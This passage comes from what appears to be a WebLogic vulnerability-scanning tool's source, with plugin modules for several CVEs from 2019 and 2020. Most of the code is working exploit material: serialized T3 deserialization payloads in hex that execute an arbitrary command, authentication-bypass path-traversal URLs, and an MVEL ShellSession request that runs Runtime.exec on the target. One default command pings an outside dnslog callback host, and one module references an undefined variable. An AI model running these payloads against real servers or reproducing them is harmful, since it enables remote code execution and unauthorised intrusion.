54 |         payload += 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3139322e3136382e31362e31323900001b590000000001eea90b00000000000000000000000000000078'
55 |         # --------- attack code end ---------
56 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
57 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
58 |         sock.send(bytes.fromhex(payload))
59 |         time.sleep(delay)
60 |         try:
61 |             res = sock.recv(4096)
62 |             r = re.search(b'\\$Proxy[0-9]+', res)
63 |             return not r is None, {'msg': 'finish.'}
64 |         except socket.timeout:
65 |             return False, {'msg': 'connection timeout.'}
66 | 
67 | 
68 | def run(queue: SyncManager.Queue, data: Dict):
69 |     obj = CVE_2019_2890()
70 |     result = {
71 |         'IP': data['IP'],
72 |         'PORT': data['PORT'],
73 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
74 |         'MSG': '',
75 |         'STATE': False
76 |     }
77 |     result['STATE'], result['MSG'] = obj.light_and_msg(
78 |         data['IP'], data['PORT'], data['IS_SSL'])
79 | 
80 |     queue.put(result)
81 | 


--------------------------------------------------------------------------------
/stars/cve_2020_14750.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2020-14750
 4 | # updated 2022/07/17
 5 | # by 0xn0ne
 6 | 
 7 | from multiprocessing.managers import SyncManager
 8 | from typing import Any, Dict, List, Mapping, Tuple, Union
 9 | import requests
10 | 
11 | from utils import http
12 | 
13 | # 有漏洞的情况
14 | # 端口不存在
15 | # An error has occurred
16 | # weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: 'x.x.x.x', port: '80'
17 | # 端口存在
18 | # An error has occurred
19 | # weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://x.x.x.x:7001 which did not have a valid SOAP content-type: text/html.
20 | from stars import Star, target_type
21 | 
22 | 
23 | # @universe.groups()
24 | class CVE_2020_14750(Star):
25 |     info = {
26 |         'NAME': '',
27 |         'CVE': 'CVE-2020-14750',
28 |         'TAG': []
29 |     }
30 |     type = target_type.VULNERABILITY
31 | 
32 |     def light_up(self, dip, dport, force_ssl=None, *args, **kwargs) -> (bool, dict):
33 |         session = requests.Session()
34 |         paths = [
35 |             '/images/%252E./console.portal',
36 |             '/images/%252e%252e%252fconsole.portal',
37 |             '/css/%252E./console.portal',
38 |             '/css/%252e%252e%252fconsole.portal',
39 |             '/console/images/%252E./console.portal',
40 |             '/console/images/%252e%252e%252fconsole.portal',
41 |             '/console/css/%252E./console.portal',
42 |             '/console/css/%252e%252e%252fconsole.portal', ]
43 |         for path in paths:
44 |             r, data = http(
45 |                 'http://{}:{}{}'.format(dip, dport, path), ssl=force_ssl, session=session, timeout=5)
46 |             r, data = http(
47 |                 'http://{}:{}{}'.format(dip, dport, path), ssl=force_ssl, session=session, timeout=5)
48 |             if r and 'id="welcome"' in r.text:
49 |                 return True, {'url': r.url}
50 |         return False, {}
51 | 
52 | 
53 | def run(queue: SyncManager.Queue, data: Dict):
54 |     obj = CVE_2020_14750()
55 |     result = {
56 |         'IP': data['IP'],
57 |         'PORT': data['PORT'],
58 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
59 |         'MSG': '',
60 |         'STATE': False
61 |     }
62 |     result['STATE'], result['MSG'] = obj.light_and_msg(
63 |         data['IP'], data['PORT'], data['IS_SSL'])
64 | 
65 |     queue.put(result)
66 | 


--------------------------------------------------------------------------------
/stars/cve_2020_14882.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2020-14882
 4 | # updated 2020/11/27
 5 | # by 0xn0ne
 6 | import requests
 7 | from multiprocessing.managers import SyncManager
 8 | from typing import Any, Dict, List, Mapping, Tuple, Union
 9 | 
10 | from stars import target_type, Star
11 | from utils import http
12 | 
13 | 
14 | # @universe.groups()
15 | class CVE_2020_14882(Star):
16 |     info = {
17 |         'NAME': 'webLogic bypass authentication',
18 |         'CVE': 'CVE-2020-14882',
19 |         'TAG': []
20 |     }
21 |     type = target_type.VULNERABILITY
22 | 
23 |     def light_up(self, dip, dport, force_ssl=None, *args, **kwargs) -> (bool, dict):
24 |         session = requests.session()
25 |         for path in paths:
26 |             http('http://{}:{}/console/css/%252e%252e%252fconsole.portal'.format(dip,
27 |                 dport), ssl=force_ssl, session=session)
28 |             r, data = http('http://{}:{}/console/css/%252e%252e%252fconsole.portal'.format(
29 |                 dip, dport), ssl=force_ssl, session=session)
30 | 
31 |             if r and r.status_code == 200:
32 |                 return True, {'url': r.url}
33 |         return False, {}
34 | 
35 | 
36 | def run(queue: SyncManager.Queue, data: Dict):
37 |     obj = CVE_2020_14882()
38 |     result = {
39 |         'IP': data['IP'],
40 |         'PORT': data['PORT'],
41 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
42 |         'MSG': '',
43 |         'STATE': False
44 |     }
45 |     result['STATE'], result['MSG'] = obj.light_and_msg(
46 |         data['IP'], data['PORT'], data['IS_SSL'])
47 | 
48 |     queue.put(result)
49 | 


--------------------------------------------------------------------------------
/stars/cve_2020_14883.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2020-14883
 4 | # updated 2020/11/27
 5 | # by 0xn0ne
 6 | import requests
 7 | from multiprocessing.managers import SyncManager
 8 | from typing import Any, Dict, List, Mapping, Tuple, Union
 9 | 
10 | from stars import target_type, Star
11 | from utils import http
12 | 
13 | 
14 | # @universe.groups()
15 | class CVE_2020_14883(Star):
16 |     info = {
17 |         'NAME': 'webLogic rce',
18 |         'CVE': 'CVE-2020-14883',
19 |         'TAG': []
20 |     }
21 |     type = target_type.VULNERABILITY
22 | 
23 |     def light_up(self, dip, dport, force_ssl=None, *args, **kwargs) -> (bool, dict):
24 |         # sess = requests.session()
25 |         # http('http://{}:{}/console/css/%252e%252e%252fconsole.portal'.format(dip, dport), headers=headers,
26 |         #      ssl=force_ssl, session=sess)
27 |         url = 'http://{}:{}/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/css/test.txt%27);%22)'
28 |         http(url.format(dip, dport), ssl=force_ssl)
29 |         r, data = http('http://{}:{}/console/framework/skins/wlsconsole/css/test.txt'.format(dip, dport),
30 |                        ssl=force_ssl)
31 |         if r and r.status_code == 200:
32 |             return True, {'url': r.url}
33 |         return False, {}
34 | 
35 | 
36 | def run(queue: SyncManager.Queue, data: Dict):
37 |     obj = CVE_2020_14883()
38 |     result = {
39 |         'IP': data['IP'],
40 |         'PORT': data['PORT'],
41 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
42 |         'MSG': '',
43 |         'STATE': False
44 |     }
45 |     result['STATE'], result['MSG'] = obj.light_and_msg(
46 |         data['IP'], data['PORT'], data['IS_SSL'])
47 | 
48 |     queue.put(result)
49 | 


--------------------------------------------------------------------------------
/stars/cve_2020_2551.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2020-2551
 4 | # updated 2020/03/07
 5 | # by 0xn0ne
 6 | # 不会 java，该漏洞的分析也没人发，对该 POC 还不是很理解
 7 | 
 8 | import socket
 9 | from multiprocessing.managers import SyncManager
10 | from typing import Any, Dict, List, Mapping, Tuple, Union
11 | 
12 | from stars import target_type, Star
13 | 
14 | 
15 | # @universe.groups()
16 | class CVE_2020_2551(Star):
17 |     info = {
18 |         'NAME': '',
19 |         'CVE': 'CVE-2020-2551',
20 |         'TAG': []
21 |     }
22 |     type = target_type.MODULE
23 | 
24 |     def light_up(self, dip, dport, force_ssl=None, timeout=5, *args, **kwargs) -> (bool, dict):
25 |         # t3 handshake
26 |         dport = int(dport)
27 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
28 |         sock.settimeout(timeout)
29 |         try:
30 |             sock.connect((dip, dport))
31 |         except socket.timeout:
32 |             return False, {'msg': 'connection timeout.'}
33 |         except ConnectionRefusedError:
34 |             return False, {'msg': 'connection refuse.'}
35 |         sock.send(bytes.fromhex(
36 |             '47494f50010200030000001700000002000000000000000b4e616d6553657276696365'))
37 |         res = sock.recv(1024)
38 | 
39 |         return b'GIOP' in res, {'msg': 'finish.'}
40 | 
41 | 
42 | def run(queue: SyncManager.Queue, data: Dict):
43 |     obj = CVE_2020_2551()
44 |     result = {
45 |         'IP': data['IP'],
46 |         'PORT': data['PORT'],
47 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
48 |         'MSG': '',
49 |         'STATE': False
50 |     }
51 |     result['STATE'], result['MSG'] = obj.light_and_msg(
52 |         data['IP'], data['PORT'], data['IS_SSL'])
53 | 
54 |     queue.put(result)
55 | 


--------------------------------------------------------------------------------
/stars/cve_2020_2555.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2020-2555
 4 | # updated 2020/06/09
 5 | # by zhzyker（exploit unsuccessful, maybe wrong）
 6 | 
 7 | import re
 8 | import socket
 9 | import time
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | from stars import target_type, Star
14 | 
15 | 
16 | # @universe.groups()
17 | class CVE_2020_2555(Star):
18 |     info = {
19 |         'NAME': '',
20 |         'CVE': 'CVE-2020-2555',
21 |         'TAG': []
22 |     }
23 |     type = target_type.VULNERABILITY
24 | 
25 |     def light_up(self, dip, dport, force_ssl=None, delay=2, timeout=5, cmd='whoami', *args, **kwargs) -> (bool, dict):
26 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
27 |         # t3 handshake
28 |         dport = int(dport)
29 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 |         sock.settimeout(timeout)
31 |         try:
32 |             sock.connect((dip, dport))
33 |         except socket.timeout:
34 |             return False, {'msg': 'connection timeout.'}
35 |         except ConnectionRefusedError:
36 |             return False, {'msg': 'connection refuse.'}
37 |         sock.send(bytes.fromhex(
38 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
39 |         time.sleep(delay)
40 |         sock.recv(1024)
41 | 
42 |         # build t3 request object
43 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
44 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
45 |             '{:04x}'.format(dport))
46 |         data3 = '1a7727000d3234322e323134'
47 |         data4 = '2e312e32353461863d1d0000000078'
48 |         for d in [data1, data2, data3, data4]:
49 |             sock.send(bytes.fromhex(d))
50 | 
51 |         # send evil object data
52 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
53 |         # -------- attack code start --------
54 |         payload += 'aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000004374002079736f73657269616c2e7061796c6f6164732e4356455f323032305f323535357400124356455f323032305f323535352e6a6176617400096765744f626a6563747371007e000b0000000171007e000d71007e000e71007e000f7371007e000b0000002274001979736f73657269616c2e47656e65726174655061796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a7873720024636f6d2e74616e676f736f6c2e7574696c2e66696c7465722e4c696d697446696c74657299022596d7b4595302000649000b6d5f635061676553697a654900076d5f6e506167654c000c6d5f636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b4c00086d5f66696c74657274001a4c636f6d2f74616e676f736f6c2f7574696c2f46696c7465723b4c000f6d5f6f416e63686f72426f74746f6d71007e00014c000c6d5f6f416e63686f72546f7071007e0001787000000000000000007372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72889f81b0945d5b7f02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72658195303e7238210200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000047372002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4964656e74697479457874726163746f72936ee080c7259c4b0200007871007e0022000000007372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72ee7ae995c02fb4a20200025b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b4c00096d5f734d6574686f6471007e00057871007e002200000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65707400096765744d6574686f647371007e0028000000007571007e002b000000027070740006696e766f6b657371007e0028000000007571007e002b0000000174'
55 |         payload += '{:04x}'.format(len(cmd))
56 |         payload += cmd.encode().hex()
57 |         payload += '7400046578656370767200116a6176612e6c616e672e52756e74696d650000000000000000000000787070'
58 |         # --------- attack code end ---------
59 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
60 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
61 |         sock.send(bytes.fromhex(payload))
62 |         time.sleep(delay)
63 |         sock.send(bytes.fromhex(payload))
64 |         # raise NotImplementedError('undefine.')
65 |         try:
66 |             res = sock.recv(4096)
67 |             # r = re.search(b'\\$Proxy[0-9]+', res)
68 |             return b'weblogic' in res, {'msg': 'finish.'}
69 |         except socket.timeout:
70 |             return False, {'msg': 'connection timeout.'}
71 | 
72 | 
73 | def run(queue: SyncManager.Queue, data: Dict):
74 |     obj = CVE_2020_2555()
75 |     result = {
76 |         'IP': data['IP'],
77 |         'PORT': data['PORT'],
78 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
79 |         'MSG': '',
80 |         'STATE': False
81 |     }
82 |     result['STATE'], result['MSG'] = obj.light_and_msg(
83 |         data['IP'], data['PORT'], data['IS_SSL'])
84 | 
85 |     queue.put(result)
86 | 


--------------------------------------------------------------------------------
/stars/cve_2020_2883.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2020-2883
 4 | # updated 2020/06/09
 5 | # by zhzyker（exploit unsuccessful, maybe wrong）
 6 | 
 7 | import re
 8 | import socket
 9 | import time
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | from stars import target_type, Star
14 | 
15 | 
16 | # @universe.groups()
17 | class CVE_2020_2883(Star):
18 |     info = {
19 |         'NAME': '',
20 |         'CVE': 'CVE-2020-2883',
21 |         'TAG': []
22 |     }
23 |     type = target_type.VULNERABILITY
24 | 
25 |     def light_up(self, dip, dport, force_ssl=None, delay=2, timeout=5, cmd='ping 5nf3bz.dnslog.cn', *args,
26 |                  **kwargs) -> (bool, dict):
27 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
28 |         # t3 handshake
29 |         dport = int(dport)
30 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 |         sock.settimeout(timeout)
32 |         try:
33 |             sock.connect((dip, dport))
34 |         except socket.timeout:
35 |             return False, {'msg': 'connection timeout.'}
36 |         except ConnectionRefusedError:
37 |             return False, {'msg': 'connection refuse.'}
38 |         sock.send(bytes.fromhex(
39 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
40 |         time.sleep(delay)
41 |         sock.recv(1024)
42 | 
43 |         # build t3 request object
44 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
45 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
46 |             '{:04x}'.format(dport))
47 |         data3 = '1a7727000d3234322e323134'
48 |         data4 = '2e312e32353461863d1d0000000078'
49 |         for d in [data1, data2, data3, data4]:
50 |             sock.send(bytes.fromhex(d))
51 | 
52 |         # send evil object data
53 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
54 |         # -------- attack code start --------
55 |         payload += 'aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b78700000000273720030636f6d2e74616e676f736f6c2e7574696c2e636f6d70617261746f722e457874726163746f72436f6d70617261746f72c7ad6d3a676f3c180200014c000b6d5f657874726163746f727400224c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b78707372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72889f81b0945d5b7f02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72658195303e7238210200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000037372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72ee7ae995c02fb4a20200025b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b4c00096d5f734d6574686f647400124c6a6176612f6c616e672f537472696e673b7871007e000900000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647371007e000d000000007571007e001100000002707571007e001100000000740006696e766f6b657371007e000d000000007571007e00110000000174'
56 |         payload += '{:04x}'.format(len(cmd))
57 |         payload += cmd.encode().hex()
58 |         payload += '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178'
59 |         # --------- attack code end ---------
60 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
61 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
62 |         sock.send(bytes.fromhex(payload))
63 |         time.sleep(delay)
64 |         sock.send(bytes.fromhex(payload))
65 |         # raise NotImplementedError('undefine.')
66 |         try:
67 |             res = sock.recv(4096)
68 |             # r = re.search(b'\\$Proxy[0-9]+', res)
69 |             return b'weblogic' in res, {'msg': 'finish.'}
70 |         except socket.timeout:
71 |             return False, {'msg': 'connection timeout.'}
72 | 
73 | 
74 | def run(queue: SyncManager.Queue, data: Dict):
75 |     obj = CVE_2020_2883()
76 |     result = {
77 |         'IP': data['IP'],
78 |         'PORT': data['PORT'],
79 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
80 |         'MSG': '',
81 |         'STATE': False
82 |     }
83 |     result['STATE'], result['MSG'] = obj.light_and_msg(
84 |         data['IP'], data['PORT'], data['IS_SSL'])
85 | 
86 |     queue.put(result)
87 | 


--------------------------------------------------------------------------------
/utils/__init__.py:
--------------------------------------------------------------------------------
  1 | from typing import Tuple, Dict
  2 | 
  3 | import requests
  4 | 
  5 | import re
  6 | from urllib.parse import quote
  7 | 
